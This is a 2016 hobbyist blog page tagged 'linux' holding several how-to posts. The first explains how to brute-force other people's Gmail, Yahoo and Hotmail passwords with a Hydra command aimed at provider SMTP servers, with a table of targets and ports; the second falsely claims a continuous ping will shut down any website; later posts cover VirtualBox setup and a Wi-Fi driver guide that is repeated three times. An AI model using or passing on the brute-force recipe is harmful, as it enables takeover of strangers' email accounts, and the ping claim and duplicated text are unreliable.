Showing posts with label linux. Show all posts
Showing posts with label linux. Show all posts

Sunday, 28 August 2016

How to hack email , gmail,yahoo

Today I will tell you how to brute-force and hack any gmail, yahoo or hotmail account on linux...
Whats is BruteForce?
Bruteforcing:- It is method in which we request the server if the password we provide is correct or not..
How we can hack password with Brute-Force?
We will create a list of possible passwords and will ask hydra to request the server if these are correct or not.
How can we guess correct password?
Password.list :- We can create a list of all alphabets and 1-9 counting and ask the hydra to request the server with all the possible password that can be created using alphabets,1-9 (counting)and @#$%^ (special characters).
But we will not do it like that, that can take years because the possible passwords will exceed billions.
I will tell you to create a password list yourself or get one from [Here]
Steps :-
Create password's list
Save it to Desktop (ctrl+o) to save and (ctrl+x) to exit.

Command :-
hydra -l [Email ID] -P [password's list] -s [port] -S -t 1 -v -V smtp.gmail.com smtp
Hydra = Software that we will use
-l         = The Email Id you wanna hack
-L        = If you have a List of Emails
-p        = If you have a Password
-P        = The Password's list
-s        = Port of the server
-S        = SSL encryption (method)
-v        = View what is behind the scene
-V        = View the Passwords being used
-t         = Number of time it will check  one password.
smtp   = Server type....
We can only hack SMTP servers with brute forcing
Here is a list of SMTP email servers and their ports which can be hacked

Server | Security | Port

Gmail

smtp.gmail.com | SSL | 465

Yahoo Mail

smtp.mail.yahoo.com | SSL | 465

Yahoo Mail Plus

plus.smtp.mail.yahoo.com | SSL | 465

Yahoo UK

smtp.mail.yahoo.co.uk | SSL | 465

Yahoo Deutschland

smtp.mail.yahoo.com | SSL | 465

Yahoo AU/NZ

smtp.mail.yahoo.com.au | SSL | 465

O2

smtp.o2.ie | none | 25

O2.uk

smtp.o2.co.uk | none | 25

AT&T

smtp.att.yahoo.com | SSL | 465

Hotmail

smtp.live.com | SSL | 465

zoho Mail

smtp.zoho.com | SSL | 465

GMX.com

smtp.gmx.com | SSL | 465
For more servers visit 

Arclab

Watch the video for much graphical Demonstration


Get a step-b-Step command  text file... Below
Brute-Forcing text file...
 Get a step-b-Step command  text fileBrute-Forcing text file...

Thursday, 25 August 2016

How to hack or shut down any website using Windows, Mac and Linux

Hello everybody Today I will show you how to hack any website or server and force it to shut down or go out of order.

This attack can be done with the help of any operating systems like Kali Linux, Ubuntu, Windows, Mac etc,.

Just follow me or the video given below..
1.Open up your terminal or command prompt (cmd).
2.Type "ping URL" (here URL is you victims website or server).
3.Now your victim's ip address will be show like xx.xx.xx.xx.
4.Now again type " ping xx.xx.xx.xx -t " ( here xx.xx.xx.xx is victim's ip address)
5.Now hit enter and it will start and it will keep requesting the website or server until it shutdown
 

Thanx and please comment below if you have any query..


For more graphical demonstration watch my video video

Wednesday, 24 August 2016

Full screen Linux Virtualbox machine


Today I will show you how to get linux virtualbox to full screen mode..

Full Screen Linux
  1. Open up your browser and search for linux repositories
  2. we have to copy these to sources.list
  3. Go to sources.list in terminal     nano /etc/apt/sources.list
  4. The two lines at the bottom were already written
  5. Now copy the repositories from browser and paste them over to sources.list...
  6. Copy every line as done in my sources.list
  7. Once done press Ctrl+O to save and Ctrl+X to exit.
  8. Now let's update our environment Type apt-get update -y
  9. Now type apt-get upgrade (it will take a lot of time)..
  10. Now again type apt-get update         click enter if it asks something
  11. Now type apt-get dist-upgrade and hit enter if it asks something
  12. Now its time to reboot type reboot and your linux will restart..

 

Your Internet speed will also get faster

 

If it's done you will see Firefox instead of your Iceweasel browser...

seamless mode will get highlighted

Now it's done your Linux machine will look pretty....

Download offline TXT file

Watch step by step video guide  at

Thanx and Don't forget to subscribe




BSR 2016 08 24 04 59 28


Download Wifi Drivers in Linux or Ubuntu


There are two commands for each of the action for some one will work and for some other one....For some people "/home/kali/" will not work they need not to write it...

Linux Wifi Drivers

Follow me:-


  1. Download the drivers at [Here]
  2. Type - "cd /home/kali/Downloads"
  3. Type "ls" (small letter LS)
  4. you will see " compact-wireless-2010-06-26-p.tar.bz2 " I have moved it to Desktop so it is not showing...
  5. Type - "cp compat-wireless-2010-06-26-p.tar.bz2 /home/kali/Desktop".
  6. Type - "cd /home/kali/Desktop".
  7. Type - " ls " to see if it is copied if yes you will see "compat-wireless-2010-06-26-p.tar.bz2 " there ..
  8. Type - "tar -jxvf compat-wireless-2010-06-26-p.tar.bz2"
  9. Type - "ls"
  10. If it is showing "compat-wireless-2010-06-26-p" then its Done (this is a folder)
  11. Type - " cd compat-wireless-2010-06-26-p"
  12. Type - "make unload"
  13. Type - "make load"

Done...

Now check if it is Done type - "ifconfig"

If it shows "wlan0" and "wlan1" then its done....

It will not show any wifi network if you do it on virtual box....
If you want to see available wifi connections in virtual box you would have to buy a wifi dongle as virtual box don't allow linux to access wifi hardware...
For more info comment below

Please subscribe my blog

A video guide on the Wifi Drivers in Linux or ubuntu

[Here]

Here is a Step by Step guide to download offline....

WIFI DRIVERS LINUX

THANX

Watch this video for much graphical demonstration


BSR 2016 08 24 04 59 28


Download Wifi Drivers in Linux or Ubuntu


There are two commands for each of the action for some one will work and for some other one....For some people "/home/kali/" will not work they need not to write it...

Linux Wifi Drivers

Follow me:-


  1. Download the drivers at [Here]
  2. Type - "cd /home/kali/Downloads"
  3. Type "ls" (small letter LS)
  4. you will see " compact-wireless-2010-06-26-p.tar.bz2 " I have moved it to Desktop so it is not showing...
  5. Type - "cp compat-wireless-2010-06-26-p.tar.bz2 /home/kali/Desktop".
  6. Type - "cd /home/kali/Desktop".
  7. Type - " ls " to see if it is copied if yes you will see "compat-wireless-2010-06-26-p.tar.bz2 " there ..
  8. Type - "tar -jxvf compat-wireless-2010-06-26-p.tar.bz2"
  9. Type - "ls"
  10. If it is showing "compat-wireless-2010-06-26-p" then its Done (this is a folder)
  11. Type - " cd compat-wireless-2010-06-26-p"
  12. Type - "make unload"
  13. Type - "make load"

Done...

Now check if it is Done type - "ifconfig"

If it shows "wlan0" and "wlan1" then its done....

It will not show any wifi network if you do it on virtual box....
If you want to see available wifi connections in virtual box you would have to buy a wifi dongle as virtual box don't allow linux to access wifi hardware...
For more info comment below

Please subscribe my blog

A video guide on the Wifi Drivers in Linux or ubuntu

[Here]

Here is a Step by Step guide to download offline....

WIFI DRIVERS LINUX

THANX

Watch this video for much graphical demonstration


BSR 2016 08 24 04 59 28


Download Wifi Drivers in Linux or Ubuntu


There are two commands for each of the action for some one will work and for some other one....For some people "/home/kali/" will not work they need not to write it...

Linux Wifi Drivers

Follow me:-


  1. Download the drivers at [Here]
  2. Type - "cd /home/kali/Downloads"
  3. Type "ls" (small letter LS)
  4. you will see " compact-wireless-2010-06-26-p.tar.bz2 " I have moved it to Desktop so it is not showing...
  5. Type - "cp compat-wireless-2010-06-26-p.tar.bz2 /home/kali/Desktop".
  6. Type - "cd /home/kali/Desktop".
  7. Type - " ls " to see if it is copied if yes you will see "compat-wireless-2010-06-26-p.tar.bz2 " there ..
  8. Type - "tar -jxvf compat-wireless-2010-06-26-p.tar.bz2"
  9. Type - "ls"
  10. If it is showing "compat-wireless-2010-06-26-p" then its Done (this is a folder)
  11. Type - " cd compat-wireless-2010-06-26-p"
  12. Type - "make unload"
  13. Type - "make load"

Done...

Now check if it is Done type - "ifconfig"

If it shows "wlan0" and "wlan1" then its done....

It will not show any wifi network if you do it on virtual box....
If you want to see available wifi connections in virtual box you would have to buy a wifi dongle as virtual box don't allow linux to access wifi hardware...
For more info comment below

Please subscribe my blog

A video guide on the Wifi Drivers in Linux or ubuntu

[Here]

Here is a Step by Step guide to download offline....

WIFI DRIVERS LINUX

THANX

Watch this video for much graphical demonstration